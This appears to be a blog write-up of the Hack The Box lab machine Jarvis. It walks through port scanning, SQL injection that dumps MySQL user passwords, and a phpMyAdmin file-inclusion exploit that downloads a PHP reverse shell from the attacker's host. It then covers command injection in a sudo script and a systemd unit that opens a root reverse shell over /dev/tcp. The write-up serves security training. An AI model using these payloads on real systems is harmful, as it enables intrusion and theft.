Hack The Box: Jarvis Write-up (#20)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.143
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535
  • Port 22: — Running SSH service, OpenSSH 7.4p1 Debian 10+deb9u6.
  • Port 80: — Running HTTP service, Apache httpd 2.4.25 ((Debian)).
  • Port 64999: — Running HTTP service, Apache httpd 2.4.25 ((Debian)).
Nmap scan report for ip-10-10-10-143.ap-southeast-1.compute.internal (10.10.10.143)
Host is up (0.016s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
| 256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_ 256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
64999/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
nmap -sU -O --top-ports=100 -oA nmap/udp-top100 10.10.10.143
  • -sU: UDP scan
Nmap scan report for ip-10-10-10-143.ap-southeast-1.compute.internal (10.10.10.143)
Host is up (0.010s latency).
All 100 scanned ports on ip-10-10-10-143.ap-southeast-1.compute.internal (10.10.10.143) are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 5 23:29:26 2020 -- 1 IP address (1 host up) scanned in 104.62 seconds
  1. Port 22, OpenSSH 7.4p1 does not have common vulnerabilities. So we don’t spend time on enumeration here.
  2. Port 80 and 64999 are running Apache web service. Port 64999 is not a common port for HTTP service. Either one of this service port will give us an initial foothold to the target machine. We will check both of them and figure out. We also might need to brute force the directories for sensitive info and any version info of running web application.

Service Enumeration

Port 80 (HTTP Web Service)

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://supersecurehotel.htb:64999/ -x txt,php -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://supersecurehotel.htb:64999/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2020/09/06 07:59:04 Starting gobuster
===============================================================
/server-status (Status: 403)
===============================================================
2020/09/06 08:01:54 Finished
===============================================================
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://supersecurehotel.htb/ -x txt,php -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.143/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
2020/09/06 06:53:17 Starting gobuster
===============================================================
/images (Status: 301)
/index.php (Status: 200)
/nav.php (Status: 200)
/footer.php (Status: 200)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 301)
/connection.php (Status: 200)
/room.php (Status: 302)
/sass (Status: 301)
/server-status (Status: 403)
===============================================================
2020/09/06 06:56:40 Finished
===============================================================
union all select 1,host,user,password,5,6,7 from mysql.user

Exploitation

root@kali:/htb/Jarvis# searchsploit -m php/webapps/44928.txt
Exploit: phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)
URL: https://www.exploit-db.com/exploits/44928
Path: /usr/share/exploitdb/exploits/php/webapps/44928.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /htb/Jarvis/44928.txt
...
1. Run SQL Query : select '<?php phpinfo();exit;?>'
2. Include the session file :
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
http://supersecurehotel.htb/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_<PHPmyadmin session cookie>
cp /usr/share/webshells/php/php-reverse-shell.php .
select '<?php exec("wget -O /var/www/html/shell.php http://10.10.14.31/php-reverse-shell.php"); ?>'
root@kali:/htb/Jarvis# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
http://supersecurehotel.htb/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_<PHPmyadmin session cookie>
root@kali:/htb/Jarvis# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.143 - - [08/Sep/2020 01:05:32] "GET /php-reverse-shell.php HTTP/1.1" 200 -
10.10.10.143 - - [08/Sep/2020 01:05:32] "GET /php-reverse-shell.php HTTP/1.1" 200 -
root@kali:/htb/Jarvis# nc -nlvp 53
listening on [any] 53 ...
http://supersecurehotel.htb/shell.php
9999 union select 1,2,(select '<?php exec(\"wget -O /var/www/html/shell.php http://10.10.14.31/php-reverse-shell.php\")),4,5,6,7 INTO OUTFILE '/var/www/html/test.php'
python -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo;fg
export TERM=xterm

Post-Exploitation Enumeration

www-data@jarvis:/$ find / -name user.txt -type f 2>/dev/null
/home/pepper/user.txt
www-data@jarvis:/$ ls -l /home/pepper/user.txt
-r--r----- 1 root pepper 33 Mar 5 2019 /home/pepper/user.txt
www-data@jarvis:/$ sudo -l
Matching Defaults entries for www-data on jarvis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on jarvis:
(pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
...
def exec_ping():
forbidden = ['&', ';', '-', '`', '||', '|']
command = input('Enter an IP: ')
for i in forbidden:
if i in command:
print('Got you')
exit()
os.system('ping ' + command)
if __name__ == '__main__':
show_header()
if len(sys.argv) != 2:
show_help()
exit()
...
elif sys.argv[1] == '-p':
exec_ping()
exit()
else:
show_help()
exit()
www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
_ _
___(_)_ __ ___ _ __ | | ___ _ __ _ __ _ _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | | __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
|_| |_| |___/
@ironhackers.es

***********************************************
Enter an IP: $(id)
ping: groups=1000(pepper): Temporary failure in name resolution

#1 Privilege Escalation

bash -i >& /dev/tcp/10.10.14.31/53 0>&1
nc -nlvp 53
$(bash /tmp/shell.php)

#2 Privilege Escalation

pepper@jarvis:~$ cat root.service 
[Unit]
Description=root shell
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.31/53 0>&1'
[Install]
WantedBy=multi-user.target
root@kali:/htb/Jarvis# nc -nlvp 53
listening on [any] 53 ...
systemctl enable /home/pepper/root.service
systemctl start root

Attack Strategy Map

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

47 Followers

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.